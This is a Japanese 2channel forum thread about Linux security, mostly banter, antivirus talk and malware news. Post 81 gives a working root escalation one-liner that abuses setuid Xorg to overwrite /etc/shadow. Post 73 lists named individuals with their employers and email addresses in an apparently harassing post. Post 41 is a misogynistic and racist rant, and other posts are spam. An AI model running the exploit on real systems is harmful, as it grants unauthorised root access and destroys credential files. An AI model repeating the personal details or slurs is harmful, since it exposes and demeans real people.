2ちゃんねる スマホ用 ■掲示板に戻る■ 全部 1- 最新50    

Linuxセキュリティ総合スレ

1 :login:Penguin:2016/06/12(日) 23:17:47.19 ID:OMH3td/9.net
Linuxを安全に使うためにセキュリティについて語りましょう!

2 :login:Penguin:2016/06/12(日) 23:38:08.55 ID:yP8FUEwn.net
インターネットに繋がない

3 :login:Penguin:2016/06/13(月) 06:09:27.32 ID:eDU8tci1.net
電源を入れない

4 :login:Penguin:2016/06/13(月) 10:29:04.09 ID:Oh9pGuME.net
気にしない

5 :login:Penguin:2016/06/13(月) 11:01:38.26 ID:2M58TAyx.net
SAKOKU を使う

6 :login:Penguin:2016/06/13(月) 11:57:17.29 ID:J1aqrsrp.net
勝つためには戦わないこと(´・ω・`)

7 :login:Penguin:2016/06/13(月) 12:21:18.30 ID:8nJEuh/y.net
手始めにiptableから乗り換える話書けや

8 :login:Penguin:2016/06/13(月) 15:37:47.75 ID:0TZsX1cx.net
セキュリティ総合ってことはウィルス対策もここでいいよね?

9 :login:Penguin:2016/06/13(月) 20:14:08.76 ID:4q925383F
Snortを導入する!ただホワイトリスト作るのめっちゃしんどい

10 :login:Penguin:2016/06/13(月) 20:55:43.29 ID:j5ciL7QT.net
そもそもLinux使うこと自体が対策に成り得る

11 :login:Penguin:2016/06/13(月) 22:05:23.35 ID:Qr5Zi0oD.net
サイバーノーガード戦法だ

12 :login:Penguin:2016/06/13(月) 22:14:04.99 ID:K9ELyhAn.net
nftの情報仕入れることを期待してたんだけど、セキュリティのスレなのな。
最近nftに移行はしたけど、iptableで指定した項目が全て移せたわけではないな〜。

13 :login:Penguin:2016/06/13(月) 22:30:22.37 ID:THPCncF9.net
重複
http://hayabusa6.2ch.net/test/read.cgi/linux/1150732249/

14 :login:Penguin:2016/06/13(月) 22:50:37.82 ID:4q925383F
FWのログ、数秒間に30個ぐらい色んなDNSサーバにアクセスしてるのを結構見るんだけど、
あらかじめ設定しておいたプロバイダのDNSサーバに問い合わせるだけじゃダメなん?

15 :login:Penguin:2016/06/20(月) 09:45:44.94 ID:EE0G5RY5.net
UACが欲しい(´・ω・`)

16 :login:Penguin:2016/06/27(月) 21:17:47.20 ID:1MSZfZlD.net
代わりにキーリングをあげよう

17 :login:Penguin:2016/07/08(金) 22:16:34.93 ID:nKTBpDXx.net
ぱんつくれ !

18 :login:Penguin:2016/07/11(月) 20:45:28.85 ID:1UAhQw4h.net
(´・ω・`)・ω・`) キャー
/  つ⊂   \  怖いー

19 :login:Penguin:2016/07/16(土) 12:23:29.36 ID:az2Lvjtg.net
make pan

20 :login:Penguin:2016/07/28(木) 14:39:09.27 ID:vgMn1AfM.net
残念ながらいくつかの解決が困難な問題のせいで今やUnix/LinuxよりWindowsのほうが遥かにセキュアだからな。
被害が少ないのはただ単に狙われてないからってだけ。

1.su/sudoが糞
glibcの脆弱性GHOSTの発見に関わった人のコメント

http://www.openwall.com/lists/owl-users/2004/10/22/2
> If it would be permitted for a non-root user to su to root, then anyone who could have compromised the user's account[1] would also be able to hijack a su session[2] and then su to root himself.
> [1] Such a compromise could occur in a variety of ways: Web/FTP/etc.
> client vulnerabilities, password snooping, etc.
> [2] For example, edit the user's shell startup scripts to make su an alias for a custom su wrapper program.

http://www.openwall.com/lists/owl-users/2004/10/20/6
> unfortunately both su and sudo are subtly but fundamentally flawed.
> So the separation between the non-root and the root accounts is lost.


suやsudoを使える非rootのアカウントが攻撃者に侵入された時点で、攻撃者はそのアカウントの~/.bashrcなどにパスワードを盗むラッパーを実際のsu/sudoのaliasやfunctionとして仕込んだり出来る。
次に正規のユーザーがsu/sudoを使おうとすると攻撃者の仕込んだラッパーが実行され攻撃者はパスワードを得ることが出来、あとは攻撃者もsu/sudoを使い放題となる。
結果としてこれらのツールのせいでrootと非rootというユーザーの分離という一番基本的なセキュリティさえ無意味になっている。

21 :login:Penguin:2016/07/29(金) 08:18:56.26 ID:3v5CyHDC.net
じゃけんSELinux使いましょうね

22 :login:Penguin:2016/07/29(金) 11:43:36.67 ID:c3kWqYGY.net
セキュリティ対策がはっきりしない以上Win使いしかいない
でもw10こわいわー

23 :login:Penguin:2016/07/29(金) 12:00:07.41 ID:r5rsVV/0.net
>>20
侵入された時点でおしまいだろうに何言ってんだこいつって感じですかね。

24 :login:Penguin:2016/07/29(金) 15:11:35.83 ID:2cIkyZpH.net
>>23
今の時代は「侵入された時点でおしまい」が許されないからこそブラウザとかはseccompやnamespaceを駆使して仮に脆弱性経由で何かコードが実行されても被害を最小限に食い止めるようにsandbox化に力を入れてたりするんだが
そもそもそれが許されるなら、一人で使うデスクトップ用途ではUbuntuみたいなわざわざ「普段非rootでログインして必要な時だけsu/sudoでrootになって実行する」
っていう行動にはセキュリティ的には何の意味もない、最初からrootでログインしてそのままエロサイト巡りしても何ら問題ないって事になるのは理解できるか?


もっとも昔はそれでも問題ないレベルだったのでWindowsではAdministratorでのログインがデフォになってたわけだが
そのあたりをきちんと理解しないで「Unix/LinuxはWindowsよりセキュアなんですーー」で思考停止してる馬鹿が大多数のせいで今の現状があるわけだ

その間にWindowsは、UACのように権限を得るためにはきちんとそれぞれへの入出力の機密性やコマンド自身の完全性をきちんと確保して「異アカウント間の分離」を破壊しないように考慮したり、
ILのように同アカウント内でもきちんとプロセス間を分離して保護(これは>>21の言うように強制アクセス制御で"一部"は解決できる)することでよりセキュアに進化した

一方残念ながら思考停止したUnix/Linuxは、権限を得るために「何の保護もない環境」から実行される「何の保護もされてないsu/sudoコマンド」に対して「何の保護もされてない状態でパスワードを入力する事」状態が放置され、
その一番基本的な「異アカウント間の分離」すら無意味になってる体たらく
結果的に「(sudoが使える非rootユーザーが)侵入された時点で(システム全体が)おしまい」になってるので、一周回ってお前の言ってることも正解なわけだがな

25 :login:Penguin:2016/07/29(金) 15:40:50.53 ID:2cIkyZpH.net
一応フォローしとくとLinux kernel自体は割ときちんと進化してるな、NXとかASLRとかYamaとかLSMとか

きちんと設定されてなかったり(互換性のせいで出来ない)、ユーザーランドが糞の寄せ集めなせいで台無しだが

26 :login:Penguin:2016/07/29(金) 16:57:07.30 ID:AresjTJd.net
うんそれはご説ごもっともなんだけどさ、ただ危ないぞって騒ぐだけじゃなくて被害に遭った卑近な例とか挙げられないのかな?
卑近なって言ってもあなたの身近な人じゃなくてネットで皆の目に触れるようなブログやフォーラムでいいんだ。
xpが終わる時にデスクトップLinuxがって騒いでから、Linuxといえどのほほんとしてられないってのはみんな思ってることなんだ。
だから知りたいのは、いかに危険か、ではなく、危険なブツに出くわした時にどうすべきか、出くわした人はどう対処したか、なんだよ。
開発に携わった人のブログやコラム見つけて危険だ危険だって焚き付けるのなんて思考停止してもできることだろ?
LinuxユーザーがWindowsは危険だと騒ぐのが思考停止ならWindowsユーザーがLinuxは危険だと騒ぐのもまた思考停止じゃないの?対策を示すとか何かしない限り。
まるで、ゲームのバグを見つけたからプランナーや開発者より自分の方が優秀だって威張ってるデバッガーみたいだよ君は。

27 :login:Penguin:2016/07/29(金) 17:23:02.18 ID:2cIkyZpH.net
>>26
俺みたいなゴミクズには解決する力も政治力もないから2chみたいな掃き溜めでグチってんのよ
Linux好きだから改善してほしいし、もし同じように問題だと感じる人が増えてくれれば改善される可能性も増すしね

そのために敢えて居丈高にLinuxに厳しくWindowsに甘く書いたんだ、ゴメン(´・ω・`)

28 :login:Penguin:2016/07/29(金) 17:53:59.24 ID:53ApPnD4.net
windowsが仮に安全つうのは
あることするには続きは窓操作も必要だからじゃね?(あるいは暗号のようなパス書かないと辿れないとか)
そういう不便さを有難くセキュリティーが強いというのかどうか

29 :login:Penguin:2016/07/29(金) 19:36:23.87 ID:IWyIiLvv.net
Windowsがセキュリティーを確保しているのは専業のベンダー各社が競争に晒されながら製品を開発しているからであって、Windows自身が特段セキュリティに優れる訳じゃない

30 :login:Penguin:2016/07/29(金) 21:02:48.88 ID:2cIkyZpH.net
https://blog.martin-graesslin.com/blog/2015/11/looking-at-the-security-of-plasmawayland/
KDEの開発の人とかちゃんといまのXやシェルとかの実行環境には問題があることを認めてどうしたら良いか考えてる人もいるんだよなー
でも自分の開発してるソフトウェアだけが対応してもshellとかの他のソフトウェアのせいでそれが無意味になっちゃったりで困ってる

31 :login:Penguin:2016/07/30(土) 13:47:31.26 ID:m4BHHueF.net
強制アクセス制御だけでハッキングを防御できるの?できないの?
それと、強制アクセス制御のステータスってのは何らかのファイルにロギングされんの?

32 :login:Penguin:2016/07/30(土) 13:54:08.97 ID:m4BHHueF.net
Linuxなんてのは宮大工が構築した接ぎ木細工のようなもの。
ノーガードきめこんで運用してたら、そりゃあ狙われた時に簡単にクラッシュしますがな。
(肝心な釘打ち無しで構築してるもんだから)
Windowsの世界ではねセキュリティソフト入れて丸投げしてるわけ。
但し、ユーザーの中には変わり者がいて、ノーガードな奴もいる訳、
まあ、他人ごとでどうなろうが知ったことじゃないが…

33 :login:Penguin:2016/08/13(土) 02:05:03.68 ID:oD+tGgzq.net
LinuxのTCPに脆弱性、トラフィックを乗っ取られる恐れ
http://www.itmedia.co.jp/enterprise/articles/1608/12/news047.html

34 :login:Penguin:2016/08/13(土) 04:51:41.40 ID:aN9vHd6i.net
>>33
すぐ更新されるから慌てなさんな

35 :login:Penguin:2016/08/13(土) 08:48:05.17 ID:TXBKXjH8.net
>>34
2012年からあった脆弱性がすぐに修正されるの?

36 :login:Penguin:2016/08/13(土) 08:55:27.99 ID:1K0xoI1z.net
すでにパッチは出ているぞい

37 :login:Penguin:2016/08/13(土) 11:19:12.09 ID:UrcrvCqb.net
大して重要じゃないと思われてたから放置されてただけで、
修正が難しいわけじゃないのだろう。

38 :login:Penguin:2016/08/14(日) 13:17:03.39 ID:gduCaAAf.net
「誰も気づかなかったけど2012年からひっそり存在していた物が今発見されてすぐに修正された」
だろ

39 :login:Penguin:2016/08/14(日) 14:21:25.00 ID:IM019vfG.net
日本の官公庁のサーバのセキュリティってまともなの?

40 :login:Penguin:2016/08/14(日) 18:52:10.23 ID:fe3iWrgq.net
>>39
自分で確認したら?ガバガバだから。ただし、法令違反で引っ張られないように工夫しろよ。
官公庁はWindows serverじゃないの?

41 :login:Penguin:2016/09/03(土) 02:42:39.64 ID:T3i7Gd65.net
アグレックスって その13

なんで飲み行かないの?
なんで女の子誘って飲みに行かないの?
声掛けないと飲みいけないのに。
話しないと恋は始まらないよ。
声掛けないとSEXもさせてくれないのに。
声掛けないから、
ヤンキーみたいなオジサンが誘いだして大きなこと言って、不倫してるよ。
女の子誘って飲みにきなよ。
女の子に声掛けないと、恋も出来ないよ。
SEXしたかったら、声掛けて飲みに行きなよ。
残業してる間に、持っていかれちゃってるよ。
後ろから見たら、がに股になってる女の子見たことない?
SEXしたかったら、なんでもいいから声掛けて飲みに行きなよ。
残業しても恋はできないよ。SEXできないよ。
恋をしなけりゃ、SEXはさせてもらえない。
恋をするには、話して気に入ってもらうしかない。
気に入ってもらうには、飲み行くのが近道だろ。
別に会議で、大きな事言ってもいいけど。
どうせSEX出来るまで何度も繰り返すんだろうから、
そのうち年配の方々にめんどくさがられて、遠くに飛ばされるよ。
そんなだったら、飲みに行くのが一番だろ。
別にがに股のさせこちゃんを探して、お願いしてみてもいいけど。
ばれたとき、周りの目が厳しいぞ。

お前が呼ばないから、ほらみろ可愛い子はみんなやられて。
  残っているのはブスばかりになってるじゃないか。
  ブスはキツイぞ。

誘えないなら、韓国人でも買えよ。みんなそうしてるぞ。

42 :login:Penguin:2016/09/06(火) 16:46:15.64 ID:vVf8gi4f.net
clamAVでは不安だお(´・ω・`)

43 :login:Penguin:2016/09/06(火) 22:53:44.42 ID:TopTMWtn.net
>>42
なんでよ?シスコ様だぞ?

44 :login:Penguin:2016/09/07(水) 07:09:59.88 ID:O110MSh/.net
常駐じゃないと安心できないマン

45 :login:Penguin:2016/09/13(火) 10:37:58.85 ID:g0CBlyhH.net
常駐か駐留か進駐か それが問題である

46 :login:Penguin:2016/09/17(土) 18:12:13.92 ID:9GLGaOH4.net
ギブミーチョコレート

47 :login:Penguin:2016/09/29(木) 12:32:01.60 ID:ZwQJlT8x.net
尻|ω゚ )┻┛身動きとれんのだが・・・

48 :login:Penguin:2016/09/29(木) 12:44:59.58 ID:5wiRFmuo.net
NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""

49 :login:Penguin:2016/09/29(木) 12:54:29.04 ID:lvJNOdKb.net
最強のiptablesの設定をうぷしてくれる神いないの?

50 :login:Penguin:2016/09/29(木) 20:57:19.24 ID:SWTYFo2r.net
firewalldに乗り換えれ

51 :login:Penguin:2016/10/04(火) 17:05:57.73 ID:ZgAPWl/3.net
>>50
乗り換えると最強になるの?

52 :login:Penguin:2016/10/04(火) 21:10:03.74 ID:MfnjwfuN.net
設定が簡単になるから、「設定をうぷしてくれ」とは思わなくなる

53 :login:Penguin:2016/10/23(日) 10:01:10.29 ID:PWQ2IPcX.net
>>52
出て行く通信のフィルタを書くためには
結局IPTABLES書かなきゃいけないのはなおった?
なおったなら乗り換える。

54 :login:Penguin:2016/11/30(水) 12:37:43.41 ID:SfHGIzEu.net
   ∧,,,∧
   (´・ω・) < おっかのうえひっなげしのはぁながぁぁ 〜
   (U   )
   `u-u´

55 :login:Penguin:2017/01/20(金) 17:47:06.69 ID:OITYnSWZ.net
      ___
      (\ ∞ ノ  
      ヽ)_ノ  迫る〜パンチ〜〜♪
      (=O┬O
    ◎-ヽJ┴◎ キキ〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

56 :login:Penguin:2017/02/01(水) 08:09:39.67 ID:gwo76No6.net
     .γ ⌒ ヾ 
     (´・ω・`)  迫る〜ハゲッ♪ 
      (=O┬O
    ◎-ヽJ┴◎ キキ〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

57 :login:Penguin:2017/02/13(月) 20:59:43.28 ID:aKHZLuDZ.net
顔がでかいなぁ・・・

58 :login:Penguin:2017/03/08(水) 21:47:52.30 ID:TuQ4x/Y7.net
       ∧_∧
      .ミ,,・_・ミ   迫る〜ハゲッ♪ 
      (=O┬O
    ◎-ヽJ┴◎ キキ〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

59 :login:Penguin:2017/04/19(水) 13:43:38.91 ID:kexeXY6M.net
(´・ω・´・ω・ω・`)知らんがなトリオ

60 :login:Penguin:2017/04/28(金) 16:59:33.55 ID:ZiXyj8JT.net
Linuxの方がWindowsよりもセキュアだっていうのは
過去の話なんすね。それなのに未だにLinuxを
安全って紹介してる所ばかりなのは何でですかね

61 :login:Penguin:2017/04/30(日) 00:21:15.39 ID:zhwkJ+1u.net
Linuxで被害出たという報告は少ないでしょ
Windowsでは散々あるけど

62 :login:Penguin:2017/04/30(日) 00:36:51.26 ID:3yi8UZQK.net
使う奴のスキル/知識レベル次第だから、OSが解決できる問題じゃないよ

63 :login:Penguin:2017/04/30(日) 14:38:15.54 ID:6nvs6+SR.net
んだんだ !

64 :login:Penguin:2017/04/30(日) 19:21:48.33 ID:K1kIRV9a.net
clamとかselinuxとか、皆さん使っていますか?

マシンの使用用途によりけりだとは思いますが、
僕の自宅鯖はfail2banだけです。
有用な物や便利な物があれば教えて欲しいです。

65 :login:Penguin:2017/05/09(火) 10:29:04.72 ID:6kIUOBHa.net
他人のサーバ管理してるけど、
今までosの脆弱性突かれてどうこうてのは
無いなあ

過去10年起きたのは、全てユーザーの問題
クソみたいなパスワード突破されたとか、
ゴミみたいなコードからのインジェクションとかのみ

66 :login:Penguin:2017/06/16(金) 09:15:27.82 ID:Cv6QgGNP.net
今年も夏を乗りきれず逝く小型PCがいるのでしょうね

67 :login:Penguin:2017/06/16(金) 09:16:10.27 ID:Cv6QgGNP.net
誤爆失礼

68 :login:Penguin:2017/07/03(月) 23:36:13.34 ID:cDHqg+NI.net
openssl enc -e -aes256
で暗号化してたファイルが、急に、
openssl enc -d 〜
で開けなくなりました。

ファイルが壊れたかとめちゃくちゃ焦ったけど、
タイムスタンプは去年のまま変化なし。
本家から、1.0.2lを落としてコンパイルした実行ファイルからだと
問題なく開けたからファイルの問題ではない模様。
1.1.0のバグですか?
#確か2ヶ月前ぐらいだとパッケージインストールされている
1.1.0系でも問題なかったはずですが。

linux-mint(ubuntu16.04)です。

69 :login:Penguin:2017/07/04(火) 01:23:11.94 ID:RdyHvcf/.net
>>68
くだらねえ質問はここに書き込め!Part 228
http://hayabusa6.2ch.net/test/read.cgi/linux/1494314571/

で聞いたほうが良いと思う

70 :66:2017/07/05(水) 00:22:13.88 ID:uEgHtGC3.net
>69
ありがとう。
次回からそうするわ。

ちなみに、今回のは下記参考に自己解決したっぽい。
-md md5付けたら、現行1.1.0でもファイル開けました。

https://github.com/fastlane/fastlane/issues/9542

https://unix.stackexchange.com/questions/344150/why-can-one-box-decrypt-a-file-with-openssl-but-another-one-cant

71 :login:Penguin:2017/09/07(木) 19:37:24.22 ID:NhVQ+S22.net
すまん誰か教えてくれ!

全くセキュリティーパッチを充てていないrhel6.1で、poodle対策をしなきゃいけないんだが、
設定変更だけで対処する場合は、ssl.confのcipherのところに -sslv3入れるだけで良い?

72 :login:Penguin:2017/10/16(月) 19:17:31.78 ID:AvEU8VfP.net
           。o0○( zzzz… )
        _,,..,,,,_
       / ,' 3/⌒ヽ-、_   
     /l.  /____/
      ̄ ̄ ̄ ̄ ̄ ̄ ̄   

73 :login:Penguin:2017/11/03(金) 21:09:20.77 ID:UMEHXcXh.net
【 日立製作所 】焦土戦

セキュリティの基本は尖らないこと、目立たないこと。隠すこと。 バカ。

新名主 隆志 TIS shimmyozu.takashi@technopro.com
色田 眞吾 日立製作所 Shikita.Shingo@technopro.com
八木 一暢 TIS yagi.kazunobu@technopro.com
水野 潤 ハマゴムエイコム Mizuno.Jun@technopro.com
佐々木 優也 (首都圏第1支店案件) sasaki.yuya@technopro.com
佐々木 健太 日立製作所 sasaki.kenta@technopro.com
中野 洋行 NSSLCサービス Nakano.Hiroyuki@technopro.com
永井 真祐子 富士ソフト nagai.mayuko@technopro.com
品川区高輪3-25-33
都内のトイレに花子さんだ
日立の末端は、ただの派遣会社だからな。メーカーはどこも一緒か。。

74 :login:Penguin:2017/12/29(金) 13:14:18.48 ID:S/CsVkMC.net
誰でも簡単にパソコン1台で稼げる方法など
参考までに、
⇒ 『宮本のゴウリエセレレ』 というブログで見ることができるらしいです。

グーグル検索⇒『宮本のゴウリエセレレ』

HRT6GIPYTB

75 :login:Penguin:2018/04/11(水) 07:03:34.17 ID:9VtMkuZE.net
           。o0○( zzzz… )
        _,,..,,,,_
       / ,' 3/⌒ヽ-、_   
     /l.  /____/
      ̄ ̄ ̄ ̄ ̄ ̄ ̄  

76 :login:Penguin:2018/05/22(火) 11:10:27.97 ID:Czl6p0FW.net
僕の知り合いの知り合いができた副業情報ドットコム
関心がある人だけ見てください。
グーグルで検索するといいかも『ネットで稼ぐ方法 モニアレフヌノ』

BTBIK

77 :login:Penguin:2018/05/26(土) 09:20:44.99 ID:c6Ml0Dod.net
【緊急】LinuxベースのルーターやNASに感染するマルウェア「VPNFilter」、54カ国50万台に感染か
http://hayabusa9.2ch.net/test/read.cgi/news/1527149278/l50

78 :login:Penguin:2018/05/26(土) 12:43:59.58 ID:H0+abEbN.net
大問題じゃないか

79 :login:Penguin:2018/05/27(日) 16:31:34.31 ID:QzfBv+yQ.net
Windowsのセキュリティにはうるさい犬厨もそっ閉じ。つまり、犬問題w

80 :login:Penguin:2018/07/08(日) 20:50:42.96 ID:QTYf4jMn.net
           。o0○( zzzz… )
        _,,..,,,,_
       / ,' 3/⌒ヽ-、_   
     /l.  /____/
      ̄ ̄ ̄ ̄ ̄ ̄ ̄

81 :login:Penguin:2018/10/31(水) 11:46:41.86 ID:XLo7vX23.net
suid付きXorgを使ったroot昇格法
https://www.exploit-db.com/exploits/45697/
cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
xorgはフォントパスのリストをそのままログに書き込むことを利用してる
(shadowが上書きされるので試すならshadowのバックアップを取ってからどうぞ)

82 :login:Penguin:2019/03/10(日) 12:39:41.95 ID:BHkfBLF0.net
            i"\ ))
            | 8  )
           ∧,,,∧∩-''"
      _ ..(´・ω・`)彡  おぱんつ おぱんつ ! !
   〃(\ ∞ ,⊂彡
     `ヽ)_ノ|   | 
          し⌒J

83 :login:Penguin:2019/05/24(金) 01:31:09.68 ID:WQ5DwMzT.net
  彡⌒ ミ
  ( ´ ・ω・) 呼んだ ?

84 :login:Penguin:2019/05/31(金) 12:30:43.06 ID:bdQbsGXY.net
Linuxを狙うマルウェア「HiddenWasp」に注意 2019/05/31 06:55 後藤大地
https://news.mynavi.jp/article/20190531-833791/

Intezerは5月19日(米国時間)、Linuxシステムを標的とした新しいマルウェア「HiddenWasp」を
発見したと「Intezer - HiddenWasp Malware Stings Targeted Linux Systems」で伝えた。

このマルウェアは現在も活動を継続しており、主要なアンチウィルスシステムで検出することが
できないと指摘されている。発見されたHiddenWaspの主な特徴は以下の通り。

・Linuxマルウェアの多くは仮想通貨マイニングやDDoS攻撃に焦点を当てているが、HiddenWasp
は異なっている。HiddenWaspはトロイの木馬として設計されており、標的のシステムを純粋に
リモートコントロールするために開発されている
・HiddenWaspに感染しているユーザーはすでに標的型攻撃のターゲットになっている可能性が
高い
・HiddenWaspはMiraiやAzazelルートキットといった入手可能なオープンソース・マルウェア
から大量のソースコードが流用されている
・HiddenWaspは中国のマルウェアファミリーに強い類似性があるものの、帰属に関しては可能
性が低いと見られる

Intezerは、Linuxを標的としたマルウェアは時間の経過とともにますます複雑になり続けている
と指摘。現在、一般的な脅威でも検出率があまり高くないが、より高度な脅威はさらに検出率が
低いという。今後、Linuxを標的としたマルウェアはさらに検出が難しくなるおそれがあり、
注意が必要。

85 :login:Penguin:2019/06/01(土) 00:37:42.11 ID:/N3jDoCj.net
>>84
これはひどい

俺が唯一Linuxに移行できない理由がアンチウイルスソフトだからな
Windowsのノートンみたいに完璧なのがあれば、ノートン一つで完全に防げるけど、
Linuxにはこれがないからな

SophosAntiVirusがあるが、なぜか定義ファイルの更新が20日異常ないぞ(気のせい?)
RKHunter、Tripwire、Lynis、Firewallとかだけとかありえんだろ?

86 :login:Penguin:2019/06/01(土) 03:51:20.70 ID:BeN0lDY7.net
Linuxだから安全です。

87 :login:Penguin:2019/06/01(土) 08:23:33.96 ID:0WGBvA8D.net
ウィルス検体を各所に送り対応が早いとこは半日だったが
ノートンは3日後だったことがあった

88 :login:Penguin:2019/06/01(土) 23:05:01.15 ID:aQmSSgBv.net
>>85
毎日更新してるんじゃないかな

ノートンやトレンドマイクロが対応してない最新のウィルスを先んじて検出したことがあったし、古い日付になってる定義ファイルはベースとなるやつの日付だと思ってる。

89 :83:2019/06/02(日) 01:29:08.34 ID:Zexh2AIq.net
$ sudo /opt/sophos-av/bin/savupdate
次のバージョンをアップデート中です - SAV: 9.15.1、エンジン: 3.74.2、データ: 5.63
Updating Sophos Anti-Virus....
Updating SAVScan on-demand scanner
Updating Virus Engine and Data
Updating Manifest
Update completed.
次のバージョンにアップデートしました - SAV: 9.15.1、エンジン: 3.74.2、データ: 5.63
sdds:SOPHOS からの Sophos Anti-Virus のアップデートに成功しました


$ sudo /opt/sophos-av/bin/savdstatus --version
Copyright 1989-2018 Sophos Limited. All rights reserved.
Sophos Anti-Virus = 9.15.1
ビルドのリビジョン = 2793374
脅威検出エンジン = 3.74.2
脅威データ = 5.63
検出脅威数 = 35620036
脅威データリリース日 = 2019年05月07日 00時00分00秒
前回アップデートを確認した日時 = 2019年06月02日 01時01分28秒


と脅威データリリース日がずっと5/7のままなんだよね
これでも最悪1日毎には更新してるのかね?
ノートンだと1時間に1回は更新してるっぽいけど
更新しててくれてると助かるのだが

90 :83:2019/06/02(日) 01:30:11.25 ID:Zexh2AIq.net
>>87-88へね

91 :83:2019/06/03(月) 00:52:09.01 ID:LINEVdyy.net
>>87-88
ここ見たらやはり1日1回ぐらいは更新されてそう
実際俺のSophosは普通に6/2更新されてた

どうも"脅威データリリース日 = 2019年05月07日 00時00分00秒"と
ウイルス定義ファイル更新日は違うらしい

ウイルス定義ファイル更新日もちゃんと書けよ>Sophos


Sophos Anti-Virus: ウイルス定義ファイル (IDE ファイル) が最新の状態にアップデートされているかどうかを確認する方法
https://community.sophos.com/kb/ja-jp/121984

92 :login:Penguin:2019/06/03(月) 02:02:29.21 ID:jJq3PPoG.net
野良アプリをたくさん入れるWindowsではウイルス検知ソフトが不可欠だね。

93 :login:Penguin:2019/06/03(月) 02:06:37.36 ID:jJq3PPoG.net
しかし、経験上、ウイルス検知ソフトはそれほど当てにできない。
世に知れ渡っていないウイルスが仕込まれていた場合に
ウイルス検知ソフトがそれを正しく検出してくれることはまれ。
何ヶ月か何年かあとになって改めてチェックしてみると検出される場合がある。
でもダウンロードあと、そこまで待ってインストールする人はいない。

94 :login:Penguin:2019/06/03(月) 08:05:48.00 ID:eMJGOUo4.net
>>84
これの元記事によるとvirustotalで引っかからない
https://www.intezer.com/wp-content/uploads/2019/05/pasted-image-0-1.png
つまりノートンだろうが何だろうが脅威としないで放置されるということ
感染経路はわからんが野良危険ということだろう

95 :login:Penguin:2019/06/03(月) 22:51:46.35 ID:sgwkICkl.net
>>84
これは具体的にどう注意したらいいんだ?

96 :83:2019/06/03(月) 22:56:08.11 ID:LINEVdyy.net
やはり、Sophosのウイルス定義ファイル更新は1日1回はあるな
↓となってるから(途中に更新あったかは知らんが多分ないだろ)

昨日
<published>2019-06-02T13:03:35</published>
今日
<published>2019-06-03T13:07:34</published>

97 :login:Penguin:2019/06/04(火) 11:45:07.22 ID:JnEdCGFR.net
ソフォス個人情報入れないとダウン出来ないの?

98 :83:2019/06/04(火) 23:57:45.16 ID:8eAlB9kG.net
>>97
全部、適当に入れればいいよ
メアドは@と.orgとか.comは入れないとだめだけど、これも適当で大丈夫

99 :login:Penguin:2019/06/05(水) 09:35:56.10 ID:2u//H+UO.net
電話番号とか住所も?

100 :login:Penguin:2019/06/05(水) 21:45:09.38 ID:1PL8mpQb.net
電話番号、住所って書く欄あったっけ?
あったとしても、100%適当で通るよ
役職・法人名も適当でおk

国、県、郵便番号は日本、東京、1000000でおk

ちなみにLinux版はこれね
https://secure2.sophos.com/ja-jp/products/free-tools/sophos-antivirus-for-linux/download.aspx
https://www.sophos.com/ja-jp/products/free-tools/sophos-antivirus-for-linux.aspx

ここからいって普通に全部適当に入力しおわったら、自動でダウンロード始まるよ

101 :login:Penguin:2019/06/06(木) 13:34:15.13 ID:Vt0/9sNy.net
>>100
都道府県がなぜか受け付けてくれない

102 :login:Penguin:2019/06/06(木) 20:22:08.58 ID:yFuR+pcY.net
>>101
先に国名で「日本」選んだら都道府県欄に▲▼が出て、普通にマウスクリックで「Tokyo」が選べるようになるでしょ

国名: 日本
都道府県:Tokyo
郵便番号:100-0000

で大丈夫だよ

103 :login:Penguin:2019/06/07(金) 09:06:17.12 ID:boyNvVP0.net
>>102
▲▼が出てこない

104 :login:Penguin:2019/06/07(金) 20:09:33.53 ID:/Sk2vmHZ.net
ブラウザでsophos.comのCookeiとJavaScriptオンにしないとだめだよ
オフになってるんじゃない?

105 :login:Penguin:2019/06/07(金) 21:33:16.30 ID:yVEJ6IS3.net
Symantec Endpoint ProtecitonmpLinux用クライアントをインストールしてみたんだが、あかんファイルは警告無く消し、しかも事後報告が無いのな
これはちと使えないわ

106 :login:Penguin:2019/06/07(金) 23:40:08.48 ID:/Sk2vmHZ.net
Symantecのって無料版あったっけ?

107 :login:Penguin:2019/06/08(土) 02:35:25.81 ID:/huWGbTD.net
Symantec Endpoint Protection for linux良さそうだが、
1年間9500円アップグレード4700円って高いな

ライセンスだけでメンテナンス不要版もあるの?


値段はここの43ページ
https://www.symantec.com/content/ja/jp/micro_partner/Sales_guide_SEPSPS_14_2013Feb.pdf

108 :login:Penguin:2019/06/10(月) 15:44:13.86 ID:9N/TTeW/.net
LinuxでUEFIスキャナーがついたアンチウィルスソフトってありますか?
ESETはWIn版にはあるみたいだけど、Linux版にはないみたいだし。
UEFIの脆弱性(Intel ME)を考えたらLinuxパソコンの最大の弱点はUEFIだと思うのですが。
オープンソースで誰か作ってくれないかな・・・

109 :login:Penguin:2019/06/18(火) 02:35:54.34 ID:AVJfVicP.net
マイクロソフト、Azure顧客にEximワームに注意を呼びかけ
Catalin Cimpanu (ZDNet.com) 翻訳校正: 編集部 2019年06月17日 10時47分
https://japan.zdnet.com/article/35138550/

 Microsoftは米国時間6月14日、「Exim」経由で拡散するLinuxのワームについて、一部の
Azureも影響を受けるとしてAzure顧客向けに警告を出した。

 このワームは米ZDNetが6月13日に最初に報じ、その後詳細情報がレポートされたもので、
CVE-2019-10149の脆弱性を利用してEximメールサーバーに感染する。この脆弱性は、悪用
されると攻撃者が遠隔からコマンドを実行してパッチを当てていないシステムを乗っ取る
ことができるというものだ。

 ワームはこの脆弱性を利用してサーバーを乗っ取り、他のサーバーをスキャンして感染を
広げようとする。そして乗っ取ったホストに暗号通貨マイニングを投下する。

 Eximはメール転送エージェント(MTA)で、Linuxベースの電子メールサーバー上で動かし
送信者から受信者に電子メールのリレーを行う。このワームはEximが動くサーバーを狙う。

 Microsoftが14日に出した警告によると、Azureインフラもこのワームの影響を受けると
いう。幸い、Azureインフラは「このワームの拡散を制限するのを助けるための制御」を
敷いているとMicrosoftは述べている。(後略)

110 :login:Penguin:2019/06/18(火) 17:26:10.39 ID:6P/bvjY8.net
Netflix報告: Linux Kernel又はFreeBSDのリモートから攻撃可能な脆弱性(TCP SACK
